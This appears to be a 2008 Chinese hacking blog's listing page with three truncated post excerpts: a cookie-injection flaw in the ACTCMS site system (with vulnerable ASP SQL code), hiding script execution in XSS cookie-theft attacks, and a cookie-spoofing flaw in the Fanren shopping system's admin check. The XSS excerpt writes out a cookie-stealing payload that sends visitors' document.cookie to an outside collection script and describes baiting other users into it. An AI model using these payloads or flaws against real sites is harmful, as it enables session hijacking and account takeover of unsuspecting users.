popphen.net.ru
  • 1 
预览模式: 普通 | 列表

ACTCMS网站管理系统cookie注入

作者:天晴无名氏 日期:2008-04-08 00:14

founder:小帅
转载请注明出处: 小帅's blog http://blog.0kee.com/xiaoshuai

<%
id=request("id")
postuser=request("postuser")
sql="select friend from clubuser where clubuser_name='&

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 215

XSS攻击Cookie欺骗中隐藏JavaScript执行

作者:天晴无名氏 日期:2008-04-02 12:30

比如发现一处可XSS地方:<script>alert(不管怎么样弹出就好)</script> 

自己弄个偷cookie的文件。

目的是让其他浏览者去浏览我们设计好的陷阱

<script>document.location='http://URL.com/cookie.php?cookie=&#39;+escape(document.co

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 165

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

作者:天晴无名氏 日期:2008-03-16 00:34

来源:Trace's Space

ad_chk.asp判断管理员登陆状态
<%
if Request.Cookies("venshop")("admin_name")="" or Request.Cookies("venshop")("admin_pass")=""

[阅读全文]

标签: Cookie 漏洞
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 194
  • 1